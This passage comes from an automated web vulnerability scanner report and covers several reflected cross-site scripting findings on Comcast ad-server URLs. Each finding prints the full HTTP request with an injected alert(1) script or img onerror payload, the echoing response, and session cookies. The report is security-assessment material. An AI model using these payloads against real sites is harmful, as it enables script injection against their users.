<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16f84a0"><script>alert(1)</script>ca5da6eb0ab/L/481562361/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.89. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a82"><img%20src%3da%20onerror%3dalert(1)>ac347692986 was submitted in the REST URL parameter 8. This input was echoed as d3a82"><img src=a onerror=alert(1)>ac347692986 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37d3a82"><img%20src%3da%20onerror%3dalert(1)>ac347692986/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 647
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1228415634/x37d3a82"><img src=a onerror=alert(1)>ac347692986/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.90. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1da"><script>alert(1)</script>7f1b0dd1ebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?5e1da"><script>alert(1)</script>7f1b0dd1ebc=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
tral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1777652602/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&5e1da"><script>alert(1)</script>7f1b0dd1ebc=1" WIDTH=2 HEIGHT=2>

2.91. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525df"><script>alert(1)</script>294ed56285c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net525df"><script>alert(1)</script>294ed56285c/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 643
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net525df"><script>alert(1)</script>294ed56285c/home/L16/372205504/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.92. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590c0"><script>alert(1)</script>dcd9f109404 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home590c0"><script>alert(1)</script>dcd9f109404/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home590c0"><script>alert(1)</script>dcd9f109404/L16/1670793816/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.93. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab9d"><script>alert(1)</script>2fc6280efcb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L167ab9d"><script>alert(1)</script>2fc6280efcb/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L167ab9d"><script>alert(1)</script>2fc6280efcb/L/2083215584/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.94. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647 was submitted in the REST URL parameter 8. This input was echoed as 85d34"><img src=a onerror=alert(1)>15c94468647 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x3785d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 647
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1898369984/x3785d34"><img src=a onerror=alert(1)>15c94468647/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.95. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803ac"><script>alert(1)</script>0d9d2df3c86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?803ac"><script>alert(1)</script>0d9d2df3c86=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
tral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1005352958/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&803ac"><script>alert(1)</script>0d9d2df3c86=1" WIDTH=2 HEIGHT=2>

2.96. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5455c"><script>alert(1)</script>6a987d872c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net5455c"><script>alert(1)</script>6a987d872c7/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 779
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net5455c"><script>alert(1)</script>6a987d872c7/com-hp/2022363852/L35/286075359/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.97. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc0c"><script>alert(1)</script>42084a2b583 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp1dc0c"><script>alert(1)</script>42084a2b583/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp1dc0c"><script>alert(1)</script>42084a2b583/2022363852/L35/1434151577/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

